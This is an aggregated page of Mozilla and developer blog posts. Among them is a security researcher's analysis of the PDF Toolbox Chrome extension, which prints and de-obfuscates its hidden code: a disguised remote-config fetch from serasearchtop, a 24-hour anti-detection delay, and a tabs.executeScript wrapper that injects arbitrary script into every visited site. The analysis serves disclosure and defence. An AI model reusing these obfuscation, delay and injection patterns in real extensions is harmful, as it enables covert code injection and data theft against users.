  • Fixed NativeMessaging API regression due to missing Unix-style path normalization on Windows (introduced by Bug 1772932 in Firefox 114, and fixed by Bug 1830605 in the same Nightly cycle)
  • Starting from Firefox 114, a deprecation warning will be logged when `browser_style: true` is being used for the MV3 extension manifests (Bug 1827910, Bug 1832578)
  • Extensions Button
    • Itiel contributed some more cleanups to the extensions button/panel CSS (Bug 1818622), thanks Itiel!

Developer Tools

DevTools
  • Canadahonk made it possible to display support conditions for `@import` CSS rules in the Rule view (bug)
    • This is gated behind the `layout.css.import-supports.enabled` pref. Screenshot of devtools Rule view showing CSS @import support conditions.
  • arai improved eager evaluation in Worker (bug)
  • Blackboxing in debugger was improved:
    • Hubert updated styling of ignored sources (bug)
    • He also added an option to hide blackboxed sources in the sources tree (bug). Screenshot of the devtools Debugger panel and a context menu item "Hide Ignored Sources".
    • Alex made JS tracing ignore blackboxed sources (bug)
  • Speaking of tracing, stdout traces now have hyperlinks which can be opened in the Firefox debugger (bug)
  • Alex made stepping in the callstack more consistent when dealing with generated and original sources (bug)
  • Alex fixed a bug in the inspector that would break markup view search when an iframe had node children, which is something uBlock does on some elements it blocks (bug)
  • Nicolas fixed an issue in console that would create an infinite loop in parent process on very short-lived documents (bug)
WebDriver BiDi
  • Julian made it possible to use elements as reference for an action (e.g. click on a specific element instead of a click at given viewport coordinates) (bug)
  • Sasha vendored puppeteer v20.1.0 (bug)

ESMification status

  • ESMified status:
    • browser: 68%
    • toolkit: 87%
    • Total: 81.6% (up from 75.5%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

  • The enabling of Prettier on JSON files has now landed.
  • Gijs has landed stylelint for css linting.
    • This will flag up errors in your CSS, like duplicate properties, invalid syntax, missing generic font families, etc. In some cases it can auto-fix things.
    • We will expand this in the next few weeks/months to cover conventions in use in Firefox (e.g. using “em” for font-size over “px”, preferring logical over physical margin/padding/border/float definitions, using “0” without a unit for sizes, etc.)
    • This is not a formatter like prettier, so it doesn’t currently adjust whitespace, indenting etc.
  • `./mach lint .` now works in parallel mode for faster linting. Previously only `./mach lint *` would work, but that didn’t pick up the top-level dot files.
  • Next up is to upgrade Prettier and enable it for production HTML files.
    • The upgrade does change a significant number of JS files due to changes in Prettier’s formatting.
    • We decided to put off enabling it on test files for now, due to the large amount of files affected.

Migration Improvements

New Tab Page

Picture-in-Picture

Search and Navigation

Storybook/Reusable Components

The Mozilla BlogHere is your secret weapon to conquering your overflowing inbox

Recently, I came across a post in one of my Facebook groups. This group is primarily women who juggle jobs in the tech space while raising children. The post asked whether people used multiple email addresses to limit their exposure to account breaches and, if so, requested advice on setting that up. First, I was surprised people cared enough to plan ahead for data breaches. I was also surprised at the responses; I didn’t realize how much time people spend organizing their emails and online accounts.

I learned that, first, people didn’t mind having more than one email account to manage. Many people had several individual email accounts for personal use, job searches, kids’ school, travel and e-commerce. Some had an individual email address “strictly for bank/financial information.” Another person wrote: “Email addresses will always end up in breaches, sooner or later. The important part is to never, ever reuse the same password for multiple accounts and activate MFA (multi-factor authentication) whenever possible.”

I was curious, so I posted a similar question to my network of friends, previous coworkers and colleagues on LinkedIn. Sure enough, there were similar themes, even though it was on a different platform with different goals. Since LinkedIn is geared toward a more professional audience, the responses were focused on people who had their own consulting business, so separation of work and personal life was essential. Here’s what I heard back: 

Great question! I have a personal email, professional email and then some of my clients have asked that I use their domain for communication with their teams. One way you can do this is through “email siblings.” https://www.cnet.com/tech/services-and-software/6-clever-gmail-tricks-to-minimize-regret-frustration-and-spam/

I have an insane amount of emails. Several for personal use. Most of my emails auto-forward to one of my main emails for ease. I have all of them, so I’m not giving out one personal email for everything.

I have one for my agency, one for my artistic hobbies (voice over and ceramics), one for general junk email and one for professional stuff that doesn’t fall into the other categories. It’s kind of a lot, but I feel more organized that way. All are hosted by Gmail and I also have two custom domains.

I have social, banking, spam/shopping, I check none of those, then separate for personal but professional and then personal where friends and travel stuff go, and I actually occasionally check the last 2. I also have one for each of my businesses and of course work email. I barely ever check any inbox, and that’s a whole another thread.

It makes total sense for people to have separate email accounts. So, I wondered if there was an easier and better way to manage those emails AND protect your personal information from data breaches. I turned to Firefox Relay, a service where you use email masks instead of your true email address to prevent emails from clogging up your inbox.

Naming it is the key to keeping it organized

I recently started using Firefox Relay after hearing about the latest update which included its integration in Firefox. How it works: Whenever I visit a site and get prompted to sign up and share my email address, I can use one of my Firefox Relay email masks or create a new one. It is super easy to use. 

Last month, I signed up for new accounts that needed my email address, for example to get notified when there is a high pollen count in my area and to shop for a new summer hat, so I used Firefox Relay. I can get up to five free email masks. Did you know that you can label each email mask? This allows you to easily tell who is reaching out and how they got your contact information. It’s simple: You go to the Firefox Relay dashboard and write a label for each mask, like shopping, information or travel.

Plus, you can quickly go to the Firefox Relay dashboard through the Firefox Relay add-on, which gives you a shortcut. Then, you can continue to reuse those email masks. This seems like the perfect solution for people who want to organize their email accounts and have all their emails in one inbox.

Tackle more stuff with the latest Firefox Relay add-on

Recently, we added new features to the Firefox Relay add-on. You can now see it in your toolbar on every site, reuse existing masks, and generate new random masks.

Firefox Relay Premium users can instantly create custom masks through the Firefox Relay add-on. For example, if you have a banking or financial account, you can call it banking@mozmail.com, and add a label like finances.

Whether you have a few or many email addresses, this is an easy way to manage them, and it comes from a company you can trust. Mozilla has a long-standing history of creating privacy-first products that people use and know their information is safe.

The Firefox Relay add-on is available for Firefox, Chrome and Firefox for Android. Try out the free version for yourself!

The post Here is your secret weapon to conquering your overflowing inbox  appeared first on The Mozilla Blog.

The Mozilla BlogMozilla Ventures Announces Investment in Rodeo, an App Empowering Gig Workers

Funding will grow the startup’s tech team, help make gig work more transparent

(UNITED KINGDOM | MAY 18, 2023) – Today, Mozilla Ventures is announcing a new investment and its first in the United Kingdom: Rodeo, an app that makes the gig work ecosystem more transparent for gig workers.

Rodeo helps workers access and control their data, providing critical insights like earnings over time and pay rates across different gig platforms. The app also allows its users to chat with fellow gig workers and swap valuable learnings and tips. Rodeo is used by more than 10,000 delivery drivers from Deliveroo, Uber Eats, and Just Eat.

Gig work is a rapidly-growing sector, with an estimated 4.4 million gig workers in the UK and likely more than 1 billion across the world. While gig work platforms have played a crucial role in unlocking economic opportunity, they have also come under fire for exploitative behavior. 

Mozilla Ventures is a first-of-its-kind impact venture fund to invest in startups that push the internet — and the tech industry — in a better direction. Mozilla Ventures isn’t publicizing its investment amount at this time. Rodeo has previously received investment from LocalGlobe and Seedcamp.

The funding will help expand Rodeo’s tech team and also defend users’ legal rights to access and portability of their data — two vital mechanisms for earning a living in the gig economy. 

Says Alfie Pearce-Higgins, Co-Founder of Rodeo: “Mozilla has always fought for interoperability and user agency. That’s why we are excited to work with Mozilla Ventures as we continue to empower gig workers and ensure their rights of data access and portability as enshrined in GDPR.”

Says Mohamed Nanabhay, Managing Partner of Mozilla Ventures: “Mozilla Ventures’ mission is to fuel companies pushing the tech industry in a better direction — companies that respect users, and that empower them with their data. Rodeo exemplifies these principles.”

Says Champika Fernando, who leads Mozilla’s Data Futures Lab: “The scales of the gig economy are currently tipped very much in favor of the platforms, not the workers. By addressing the way data is governed, we attempt to balance the scales and make the gig economy more equitable.”

Rodeo will join a cohort of other mission driven startups that Mozilla Ventures has invested in, including SAIL, heylogin, Lelapa AI, Themis AI, and Block Party. Mozilla Ventures launched in 2022 with an initial $35 million in funding.

Press contact: Kevin Zawacki | kevin@mozillafoundation.org

The post Mozilla Ventures Announces Investment in Rodeo, an App Empowering Gig Workers appeared first on The Mozilla Blog.

Mozilla Addons BlogdeclarativeNetRequest available in Firefox

The declarativeNetRequest (DNR) extension API is now available to all extensions starting from Firefox 113, released last week. Extensions with functionality that can be expressed in terms of declarative rules are highly encouraged to transition to the DNR API. Documentation is available at declarativeNetRequest (MDN).

DNR allows extensions to declare rules that describe how the browser should handle network requests. These rules enable Firefox to process network requests without involving the extension further. In comparison with the blocking webRequest API, this offers the following benefits:

  • Privacy: Blocking network requests without host permissions. DNR offers more privacy by design because extension code does not get direct access to the request details. Thus request blocking functionality can be offered without requiring scary host permissions. This feature is especially useful in Manifest Version 3, where host permissions are available on an opt-in basis.
  • Performance: Network request handling is not blocked on extension startup or on a response from the extension. DNR rules are evaluated independently of extension scripts, so a background page is not required. This characteristic is especially important for the reliability of extensions on Android, because the Android OS may terminate the background page outside of the control of the extension and browser.
  • Cross-browser: DNR is the only extension API for handling network requests that is available across the major browsers. Other than Firefox, DNR is also supported by Safari and Chromium-based browsers such as Chrome and Edge.
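To make the declarative model concrete, here is a minimal sketch of a static ruleset. The extension name, ruleset id, file name, and tracker.example domain are all illustrative, not taken from this post. The manifest registers a rule file:

```json
{
  "manifest_version": 3,
  "name": "DNR blocking sketch",
  "version": "1.0",
  "permissions": ["declarativeNetRequest"],
  "declarative_net_request": {
    "rule_resources": [
      { "id": "ruleset_1", "enabled": true, "path": "rules.json" }
    ]
  }
}
```

and rules.json pairs a condition with an action, with no extension code running per request:

```json
[
  {
    "id": 1,
    "priority": 1,
    "action": { "type": "block" },
    "condition": {
      "urlFilter": "||tracker.example",
      "resourceTypes": ["script", "image", "xmlhttprequest"]
    }
  }
]
```

The browser evaluates these rules internally and the extension never sees the request details, which is where the privacy and performance benefits above come from.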

Some extensions require more flexibility than DNR offers, and we are committed to supporting both the DNR and blocking webRequest APIs to ensure that Firefox users have access to the best privacy tools available.

What’s next

The DNR implementation is not final. We are working on further optimizations and additional functionality, which are tracked as dependencies of bug 1687755. Our work is not limited to Firefox; where it makes sense we try to establish cross-browser consensus in the WebExtensions Community Group (WECG), as seen at WECG issues with topic:dnr.

Are you interested in experimenting with the declarativeNetRequest API? Try out one of the examples at https://github.com/mdn/webextensions-examples/tree/main/dnr-dynamic-with-options. New to Firefox extension development? See the Test and debug section of the Extension Workshop to get started.

The post declarativeNetRequest available in Firefox appeared first on Mozilla Add-ons Community Blog.

This Week In RustThis Week in Rust 495

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on Twitter or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is Qdrant, an open source, production-ready vector database/similarity search engine written in Rust. There are APIs available for Rust, Python, JavaScript/TypeScript and Go.

llogiq is overjoyed with his suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

326 pull requests were merged in the last week

Rust Compiler Performance Triage

The last two weeks mostly have small changes across a number of benchmarks, no widespread large regressions or improvements.

Triage done by @simulacrum. Revision range: a368898d..3ea9ad532

6 Regressions, 3 Improvements, 4 Mixed; 2 of them in rollups. 90 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New and Updated RFCs
  • No New or Updated RFCs were created this week.
Call for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

  • No RFCs issued a call for testing this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Upcoming Events

Rusty Events between 2023-05-17 - 2023-06-14 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

That's one of the great things about Rust: sometimes you can do something really dumb and get away with it.

Rik Arends at RustNL

Thanks to Josh Triplett for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Luis VillaAnnouncing the Upstream podcast

Open is 1️⃣ all over and 2️⃣ really interesting and yet 3️⃣ there’s not enough media that takes it seriously as a cultural phenomenon, growing out of software but now going well beyond that.

And so, announcement: I’m trying to fill that hole a little bit myself. Tidelift’s new Upstream podcast, which I’m hosting, will:

  1. Pull from across open, not just from software. That’s not because software is bad or uninteresting, but because it’s the best-covered and best-networked of the many opens. So I hope to help create some bridges with the podcast. Tech will definitely come up—but it’ll be in service to the people and communities building things.
  2. Bring interesting people together. I like interview-style podcasts with guests who have related but distinct interests—and the magic is their interaction. So that’s what we’ll be aiming for here. Personal goal: two guests who find each other so interesting that they schedule coffee after the recording. Happened once so far!
  3. Be, ultimately, optimistic. It’s very easy, especially for experienced open folks, to get cynical or burnt out. I hope that this podcast can talk frankly about those challenges—but also be a recharge for those who’ve forgotten why open can be so full of hope and joy for the future.

So far I’ve recorded on:

  • The near past (crypto?) and near future (machine learning?) of open, with Molly White of Web 3 Is Going Great and Stefano Maffulli of the Open Source Initiative. Get it here! (Transcripts coming soon…)
  • The joy of open. At Tidelift, we often focus on the frustrating parts of open, like maintainer burnout, so I wanted to refresh with a talk about how open can be fun. Guests are Annie Rauwerda of the amazing Depths of Wikipedia, and Sumana Harihareswara—who among many other things, has performed plays and done standup about open software. Will release this tomorrow!
  • The impact of open on engineering culture, particularly at the intersection of our massively complex technology stacks, our tools, and our people. But we are often so focused on how culture impacts tech (the other way around) that we overlook this. I brought on Kellan Elliott-McCrea of Flickr, Etsy, and Adobe, and Adam Jacob of Chef and the forthcoming System Initiative to talk about those challenges—and opportunities.
  • The relationship of open to climate and disasters. To talk about how open intersects with some of the most pressing challenges of our time, I talked with Monica Granados, who works on climate at Creative Commons, and Heather Leson, who does digital innovation — including open — at the IFRC’s Solferino Academy. I learned a ton from this one—so excited to share it out in a few weeks.

Future episodes are still in the works, but some topics I’m hoping to cover include:

  • open and regulation: what is happening in Brussels and DC, anyway? Think of this as a follow-up to Tidelift’s posts on the Cyber Resilience Act.
  • open and water: how does open’s thinking on the commons help us think about water, and vice-versa?
  • open and ethics: if we’re not technolibertarians, what are we anyway?

I’m very open to suggestions! Let me know if there’s anyone interesting I should be talking to, or topics you want to learn more about.

We’ll be announcing future episodes through the normal Places Where You Get Your Podcasts and the Tidelift website.

The Mozilla BlogPocket’s new features make it even easier to discover and organize content

Stay Up to Date and Informed On the Topics You Care About 

Pocket’s latest updates make it simpler than ever to discover and organize high-quality content that aligns with your unique interests and passions. As you may have noticed, Pocket has been rapidly evolving and growing; we’re listening to our users so that we can continue to make Pocket the go-to destination to stay informed and keep up to date with the topics you love. Starting today, Pocket is rolling out a new mobile and web experience so you can easily find the stories and topics you care about. In addition, Pocket is launching a new feature called Lists (at launch just on web, with the feature coming to Pocket mobile later this year), which will make it simpler to organize saved content. 

Pocket iOS: A new home to quickly discover and save content

For over a decade, Pocket has been a place where millions of users stay in the know without falling into a rabbit hole. Our latest iOS update makes it easier to keep up to date while on the go with personalized recommendations and more discovery content, as well as an intuitive user interface so you can quickly catch up on topics you care about.

Since we first released Pocket on iOS in 2009, a tremendous amount has changed about what makes for a compelling app experience. We always knew that at some point, in order to move forward, we'd need to break new ground and start fresh. Last year, we made the decision to start over and build a new version of the iOS app, with quicker feature development as a primary objective. 

With the launch of the latest version of Pocket on iOS (available once you download iOS 16 on your iPhone), the redesigned app will be faster and simpler to use with a focus on a new Home experience – a starting off point for visiting everything in Pocket, from your saved content to the articles and Curated Collections we think you’ll love. We will be continuing to build on Home to provide you with different perspectives on what you’ve saved and what you’ve discovered, as well as topics like Best of the Web, Editors’ Picks, In Case You Missed It, and more.

The new redesign also includes a simplified navigation and settings screen, creating a more enjoyable user experience. The new Saves tab (formerly My List) will have an updated design, making it even more streamlined and giving Pocket users one place to access features like search, and listen, as well as to view your tagged items and favorites. We’ve also made it easier to archive items with a swipe.

Your favorite features are getting better

At the time of this release, you may have noticed that some features are missing. Fear not, friend! In a handful of cases—e.g. the feature that allows you to highlight articles—the Pocket product team is working hard to bring back the missing features to continue enhancing our user experience. 

In a few select cases, we did remove a feature from the app permanently in order to make room for new or improved experiences. For example, we removed the feature that allowed you to make recommendations to other Pocket users, to make way for the new Lists feature. Letting users share content is an important part of what makes Pocket useful, so we are actively investing in improving this experience. 

At the end of the day, all this means is that your favorite features just became a little faster and easier to use! 

What’s next for Pocket on iOS? 

Moving forward, Pocket on iOS will be updated every two weeks. In the next few months, we’ll be bringing back the ability to create and view highlights on your saved articles, improving the quality of the articles that we recommend to you, and bringing additional functionality to our Listen feature, through which you can listen to your saved articles.

Pocket on the Web: Create your own Pocket Lists

Starting today, users in the U.S. can create private lists on the web version of Pocket, where they can collect their saved articles, videos, and websites. Users will be able to create and manage multiple lists on their Pocket web experience, give them a title and description, add or remove items, and easily switch between lists as they browse their saved content. Pocket Lists make it easier to find and consume content that matters most.

“The new Pocket Lists feature will offer users a more intuitive way to organize their content, and unlike tags, which can sometimes be difficult to manage, Pocket Lists provide a more structured approach to categorizing content,” said Kait Gaiss, Pocket’s head of product management. “We’ve received many requests from Pocket users who wished to create Lists to organize their content, so we are excited to release this new feature to meet their needs.” 

Some examples of Lists you can make include: 

  • keeping track of your favorite recipes
  • saving content like videos and memes that bring you joy
  • building a travel guide for your upcoming trip (with history, culture and sites to visit)
  • creating a how-to guide for DIY projects around your home 
  • tracking articles on career planning that you want to visit again and again

How to create your own Lists on Pocket for Web

To create a new list in Pocket, follow these steps:

  1. Click Saves at the top of the screen.
  2. Click the “+” sign next to Lists in the menu on the left-hand side of the screen (or click the Create List button in the top-right side of the screen). 
  3. In the panel that appears, give your new list a name and a description.
  4. Click the Create List button to finish.

All of your lists will appear under All Lists in the panel to the left. 

Add items to your list

  1. Click on Saves in the top menu to view all of your saved items.
  2. Locate the item you want to add to a list and click the three dots at the bottom right of the card.
  3. Click Add to list from the available options.
  4. The Add to List panel will open next. Select a list from the drop-down menu.
  5. Click Save to List to add the item to your selected list.

Manage your lists

To manage your lists, click All Lists in the menu to the left. All your lists will be displayed here.

To remove an item from a list

  1. Click All Lists in the left-hand panel to view all of your lists.
  2. Select the list that contains the item you wish to remove.
  3. Find the item you want to remove from the list and click Remove at the bottom right.

Delete a list

  1. Click All Lists in the menu on the left-hand side of the screen to view all of your lists.
  2. Locate the list you want to delete and click the Delete button.
  3. Click Delete again in the prompt that appears. Note that deleting a list cannot be undone.

While the initial launch is just for U.S.-based users and on the web version of Pocket, we will open up to Pocket users worldwide this summer. Coming soon, Pocket users will be able to add multiple items to a List at once, as well as add notes to the items in their Lists (a feature that has been requested by many Pocket users so they can remember why they added that item to their List!). And later this year, Pocket users will be able to publish and share their Lists with family and friends. As mentioned previously, while Lists is only available on the web at launch, the feature will also roll out in Pocket on mobile. 

Pocket Android: Reading your favorite articles just got easier

We’re releasing new features for Reader that will help you enjoy your Pocket experience more!

  • Love reading articles that you Pocketed from your favorite news sites, but hate having to log in each time you try to access them? Say no more! Pocket will now save your login info, so you don't need to sign in each time you open saved content from those sites through the Pocket app.
  • Previous-Next buttons now work for all of your saves, whether you read them in Article View or on the original site, making it easier to continue enjoying saved content without having to return to your Saves list.
  • Reading articles on an Android tablet is now more efficient with text that is optimized for wide screens.

All of these updates are the culmination of Pocket's Android improvements, which started in January of this year.

What’s ahead for the rest of 2023

In the coming weeks and months, we’ll have more news and updates to share from Pocket. If you’re interested in staying in the know, join our mailing list!

Save and discover the best articles, stories and videos on the web

Get Pocket

The post Pocket’s new features make it even easier to discover and organize content appeared first on The Mozilla Blog.

Wladimir PalantMalicious code in PDF Toolbox extension

The PDF Toolbox extension for Google Chrome has more than 2 million users and an average rating of 4.2 in the Chrome Web Store. So I was rather surprised to discover obfuscated code in it that has apparently gone unnoticed for at least a year.

The code has been made to look like a legitimate extension API wrapper, merely with some convoluted logic on top. It takes a closer look to recognize unexpected functionality here, and quite some more effort to understand what it is doing.

This code allows serasearchtop[.]com website to inject arbitrary JavaScript code into all websites you visit. While it is impossible for me to tell what this is being used for, the most likely use is injecting ads. More nefarious uses are also possible however.

Update (2023-05-31): As I describe in a follow-up article, this extension isn’t alone. So far I found 18 malicious browser extensions using similar code with a combined user count of 55 million. It’s also clear now that these extensions are at the very least being used to redirect search pages.

What PDF Toolbox does

The functionality of the PDF Toolbox extension is mostly simple. You click the extension icon and get your options:

An extension icon showing a Swiss army knife with its pop-up open. The pop-up contains the PDF Toolbox title following by four options: Convert office documents, Merge two PDF files, Append image to PDF file, Download Opened PDFs (0 PDFs opened in your tabs)

Clicking any of the options opens a new browser tab with the actual functionality. Here you can select the files and do something with them. Most operations are done locally using the pdf-lib module. Only converting Office documents will upload the file to a web server.

And a regular website could do all of this in exactly the same way. In fact, plenty of such websites already exist. So I suspect that the option to download PDFs only exists to justify both this being a browser extension and requiring wide-reaching privileges.

See, in order to check all your tabs for downloadable PDFs this extension requires access to each and every website. A much more obvious extension design would have been: don’t bother with all tabs, check only the current tab when the extension icon is clicked. After all, people rarely trigger an extension because of some long forgotten tab from a week ago. But that would have been doable with a far less powerful activeTab permission.

While Chrome Web Store requires extension developers not to declare unnecessary permissions, this policy doesn’t seem to be consistently enforced. This extension also requests access to detailed browser tabs information and downloads, but it doesn’t use either.

The “config” file

So all of the extension functionality is contained in the browser action pop-up and the page opening in a new tab. But it still has a background page which, from the look of it, doesn’t do much: it runs Google Analytics and sets the welcome and uninstall page.

This is standard functionality found in some other extensions as well. It seems to be part of the monetization policy: the pages come from ladnet.co and display ads below the actual message, prompting you to install some other browser extensions.

The module called then-chrome is unusual however. It in turn loads a module named api, and the whole thing looks like wrapping the extension APIs similarly to Mozilla’s WebExtension API polyfill. Which would have been slightly more convincing if there were anything actually using the result.

The api module contains the following code:

var Iv = TL ?
  "http" + ff + "//s" + qc + "a" + fx + "ar" + document.location.protocol.substring(0, 2) +
    (ad ? "to" : ad) + so + "c" + document.location.protocol.substring(3, 5) + "/cf" + Sr :
  qB;
let oe = Iv;
oe += bo + (Ua + "fg.") + qB + document.location.protocol.substring(14, 16);

Weird, right? There are all these inline conditionals that don’t do anything other than obfuscating the logic. TL gets document assigned to it, ad gets chrome.runtime as its value – there is no way any of these might be missing.

This is in fact a very convoluted way of constructing a constant string: https://serasearchtop.com/cfg/bahogceckgcanpcoabcdgmoidngedmfo/cfg.json. As the next step the extension calls window.fetch() in order to download this file:

const ax = await window["fet" + document.location.protocol.substring(0, 2)](oe);
if (ax.ok)
{
  const rd = await ax.json();
  (0, af.wrapObject)(chrome, rd)
}

Calling wrapObject with chrome as the first parameter gives the impression that this is some harmless configuration data used to wrap extension APIs. The fact that the developers spent so much effort to obfuscate the address and the download tells otherwise, however.
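One detail worth spelling out: this code runs in the extension's background page, where document.location.protocol is the chrome-extension: scheme. That is what makes the seemingly random substring calls deterministic. A small sketch (my reconstruction of why these particular offsets were chosen):

```javascript
// In an extension's background page the document URL uses the
// chrome-extension: scheme, so each substring call always produces
// the same fragment of the final address.
const protocol = "chrome-extension:";
const a = protocol.substring(0, 2);   // "ch" -> completes "serasearch"
const b = protocol.substring(3, 5);   // "om" -> completes ".com"
const c = protocol.substring(14, 16); // "on" -> completes "cfg.json"
```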

Detection prevention

Before I start going through the “wrapper,” there is another piece of logic worth mentioning. Somebody probably thought that the extension making a request to serasearchtop[.]com immediately upon installation would draw suspicions. While it isn’t clear what this domain does or who is behind it, it managed to get onto a bunch of anti-tracking blocking lists.

So rather than making the request immediately, the extension waits 24 hours. This logic is also obfuscated. It looks like this (slightly cleaned up):

const rd = localStorage;
const qJ = "cfg";
const oe = Date.now();
var ax = rd.getItem(qJ);
const PB = 9993592013;
if (ax)
{
  const rd = PB - ax
  const qJ = oe - rd;
  if (qJ < (TL ? 0 : rd) || qJ > (ad ? 87217164 : TC))
  {
    // Download logic here
  }
}
else
{
  ax = PB - oe;
  rd.setItem(qJ, ax)
}

You can again ignore the inline conditionals: both conditions are always true. The PB constant is only being used to somewhat mess up the timestamp when it is being stored in localStorage.cfg. But qJ becomes the number of milliseconds since the first extension start. And 87217164 is slightly more than the number of milliseconds in 24 hours.

So one only has to change the timestamp in localStorage.cfg for the request to the “configuration” file to happen. For me, only an empty JSON file is being returned however. I suspect that this is another detection prevention mechanism on the server side. There is a cookie being set, so it will likely take some time for me to get a real response here. Maybe there is also some geo-blocking here or other conditions.
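The bypass can be sketched directly from the constants above: store a masked timestamp in localStorage.cfg that corresponds to a first start more than 24 hours in the past, and the extension's own check passes immediately. This is my reconstruction of the de-obfuscated logic, not code from the extension:

```javascript
// Reproduce the extension's timer check with a backdated timestamp.
const PB = 9993592013; // constant used to mask the stored timestamp

// Pretend the first extension start happened 25 hours ago
// (in the browser: localStorage.setItem("cfg", backdated)).
const backdated = PB - (Date.now() - 25 * 60 * 60 * 1000);

// The extension's check, de-obfuscated:
const firstStart = PB - backdated;       // recovers the (fake) first start
const elapsed = Date.now() - firstStart; // roughly 25 hours in milliseconds
const shouldDownload = elapsed < 0 || elapsed > 87217164;
```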

The “wrapper”

The wrapper module is where the config processing happens. The logic is again unnecessarily convoluted but it expects a config file like this:

{
  "something2.func2": "JSON-stringified parameters",
  "something1.func1": "this is ignored"
}

The code relies on Object.entries() implementation in Chrome listing object entries in a particular order. It will take the global scope of the extension’s background page and look up the functions listed in the keys. And it will call them in a very specific way:

something1.func1(x =>
{
  something2.func2(x, params2, () =>
  {
    chrome.runtime.lastError;
  });
});

Now I haven’t seen any proper “config” data, so I don’t really know what this is supposed to do. But the callbacks passed in and chrome.runtime.lastError indicate that something1.func1 and something2.func2 are meant to be extension API methods. And given what the extension has access to, it’s either tabs, windows or downloads API.

It took me some time to find a parameter-less API that would call the callback with a value that could be passed to another API call. In the end I realized that the first call is adding a listener. Most likely, something1.func1 is chrome.tabs.onUpdated.addListener. This also explains why chrome.runtime.lastError isn’t being checked for the first call, it is unnecessary when adding a listener.

The tab update listener will be called regularly, and its first parameter is the tab ID. Which can be passed to a number of extension APIs. Given that there is no further logic here, only one call makes sense: chrome.tabs.executeScript. So the wrapper is meant to run code like this:

chrome.tabs.onUpdated.addListener(tabId =>
{
  chrome.tabs.executeScript(tabId, {code: "arbitrary JavaScript code"}, () =>
  {
    chrome.runtime.lastError;
  });
});

Effectively, the “config” file downloaded from serasearchtop[.]com can give the extension arbitrary JavaScript code that will be injected into every web page being opened.
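Putting the pieces together, a non-empty "config" file matching this wrapper would presumably look something like the sketch below. This is pure reconstruction on my part: the server only ever returned an empty file, so the exact parameter format (a single object versus an array) is an assumption.

```javascript
// Hypothetical reconstruction of a malicious "config" response.
// Key order matters: the wrapper treats the second entry as the
// listener to add and the first as the call to make on each event.
const config = {
  "chrome.tabs.executeScript": JSON.stringify({ code: "/* injected JS */" }),
  "chrome.tabs.onUpdated.addListener": "",
};

// The parameters round-trip through JSON, as in the extension:
const params = JSON.parse(config["chrome.tabs.executeScript"]);
```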

What’s the goal?

As I’ve never seen the code being injected, we are now entering the realm of speculations. Most likely, the goal of this code is monetizing the browser extension in ways that are prohibited by the Chrome Web Store policies. Which usually means: injecting ads into websites.

One would expect users to notice however. With the latest PDF Toolbox version being published in January 2022, this has been going on for more than a year. It might have been even longer if previous versions contained this malicious code as well. Yet not one of the two million users complains in an extension review about ads. I can see a number of explanations for that:

  • The user numbers have been artificially inflated and the real user count is far lower than two million.
  • The functionality is not active, the server gives everyone an empty config file.
  • The functionality is only active in some regions, particularly those where people are unlikely to come complain in the Chrome Web Store.
  • The code is not injecting ads but rather doing something less obvious.

Concerning the last bullet point, I see a number of options. A less visible monetization alternative would be injecting cryptocurrency mining code into websites. Maybe it’s that.

Or maybe it’s something that users have almost no chance of detecting: data collection. Maybe the injected code is collecting browsing profiles. Or something more nefarious: it could be collecting online banking credentials and credit card numbers as these are being entered into websites.

Yes, these are pure speculations. It could be anything.

David HumphreyThinking about Context

I've written recently about my work on ChatCraft.org.  I've been doing a bunch of refactoring and new feature work, and things are in a pretty good state.  It mostly works the way I'd expect now.  Taras and Steven have filed a bunch of good ideas related to sharing, saving, and forking chats, and I've been exploring using SQLite Wasm for offline storage. But over the weekend I was thinking about something else.  Not a feature exactly, but a way of thinking about the linear flow of a chat.  The more I've worked with ChatCraft, the more I've learned about this form of dialog.  Because a number of separate features flow from this, I thought I'd start by sketching things out in my blog instead of git.

A Chat

The (current) unit of AI interaction is the chat.  A chat, in contrast to a conversation, dialog, debate, or any of the other ways one might describe "talking," is a kind of informal talk between friends.  The word choice also gives a nod to the modern, technical meaning of "chat" as found in "chat app" or "chat online." When we "chat," we do so without formality, often in short bursts.

What informal chats depend upon is an existing, shared (i.e., external) context between the speakers.  I want to chat with you about details for some event we're planning, or to clarify something you said on the phone, or to quickly ask for help.  I can duck in and out of the conversation without ceremony, because this "chat" does not represent anything serious or lasting.  That is, the relationship of the participants is independent of this interaction--we're just chatting.

Something similar is at work when I'm talking to an AI.  Most of what I'm saying is not present in the chat.  Maybe I want to know the specific syntax for performing an operation in a programming language.  I'm not interested in learning the language, talking about why the syntax evolved the way that it did, debating other approaches, etc.  I might write only 2 or 3 sentences, but everything I don't write is also necessary for the interaction to work.

